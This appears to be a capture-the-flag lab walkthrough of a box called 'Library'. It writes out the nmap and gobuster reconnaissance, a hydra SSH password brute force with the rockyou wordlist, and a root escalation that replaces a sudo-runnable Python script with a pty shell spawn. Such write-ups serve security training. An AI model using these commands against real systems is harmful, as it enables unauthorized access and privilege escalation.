# Library

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQD2Bfrr7tfh5HkVz4%2F-McQD5e313TgVcGeL7j5%2Fimage.png?alt=media\&token=60c7ef0a-e869-4f84-912b-3ac0beac7c0c)

## Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**)

```
nmap -Pn 10.10.121.105
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQDkqutBBnV0UmzaCl%2Fimage.png?alt=media\&token=9f5bf796-6060-45f5-bb70-76cb7bc29310)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 22,80
* (**-oN nmap**): Saving it into a file called nmap

```
nmap -sV -sC -p 22,80 -oN nmap 10.10.121.105
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQDurr0GhfB8IsC9IL%2Fimage.png?alt=media\&token=86013595-2322-46c9-afb5-eeb9508e528a)

## Enumeration&#x20;

Lets visit the webpage

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQE23d1bajrG2bXDKv%2Fimage.png?alt=media\&token=69a05369-fda5-4d88-9b0e-560135072ca4)

Looking through the website we have a username `meliodas` .&#x20;

Lets look at `robots.txt` as the nmap told us that there is a disallowed entry.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQEh9ZZZ8wI8fPSMe0%2Fimage.png?alt=media\&token=437c71e0-f5ee-4b9a-9fd5-84a4e915816d)

And there is nothing, lets run `gobuster` to find hidden directories as there is nothing else on the main page to enumerate.&#x20;

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQDKj6WbjRAAubwIL4%2F-McQF8wv4ZJqU97KTCVM%2Fimage.png?alt=media\&token=f44e1b22-f3d0-40a0-8eb0-3d44f7dea336)

Nothing interesting pops up, so lets run hydra to brute force ssh with the username meliodas.

## Exploitation

```
hydra -l meliodas -P /usr/share/wordlists/rockyou.txt ssh://10.10.121.105/
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQFtTxYJCO52yWiAx9%2F-McQG9Sw_PL2Id91NjeD%2Fimage.png?alt=media\&token=16be53c0-74d5-4fc9-a8e2-3a3688269ca9)

We have the password, lets login through ssh

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQFtTxYJCO52yWiAx9%2F-McQGT1agcb29OqzrQHc%2Fimage.png?alt=media\&token=aaddbbfa-c12e-4c69-bbd0-e1358dc8a729)

We can read the `user.txt` file

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQGbsbTnslgXXYlg1W%2Fimage.png?alt=media\&token=fa28bb6a-f7f3-43c7-bc6e-c236161e0b53)

## Privilege Escalation

We have a file called `bak.py` , lets read it and look at the permissions of the file

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQGwPrLV6c0boKFbBw%2Fimage.png?alt=media\&token=2a45d55e-6352-470b-85c7-00d9fc7bafe7)

Its owned by root! We can also run this file as root

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQHBc7IcNLzmw2gOXa%2Fimage.png?alt=media\&token=644126aa-ac74-42dc-bab6-a4ec36fed94e)

Lets change the contents of the file to get a shell as root, we cannot change the contents of the file, so lets remove the file and create a new file with the same name and our own content.

First delete the file with this command&#x20;

```
rm bak.py
```

Now we can echo the script into the file

```
echo 'import pty; pty.spawn("/bin/bash")' > /home/meliodas/bak.py
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQI5rQhHYruNV2983A%2Fimage.png?alt=media\&token=9a954026-d0c7-49c3-a6cf-f9be25406c65)

Now lets run the file

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQIDvUOqwGQ0-MrIo4%2Fimage.png?alt=media\&token=83fcbaa8-b3d9-4dac-be68-51231be106be)

We are now root, we can read the root.txt file

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQGUTJiUMn1RZRpEyN%2F-McQINgHKsxxQDyOhP9s%2Fimage.png?alt=media\&token=b70c1423-2f26-43da-9559-a75377047212)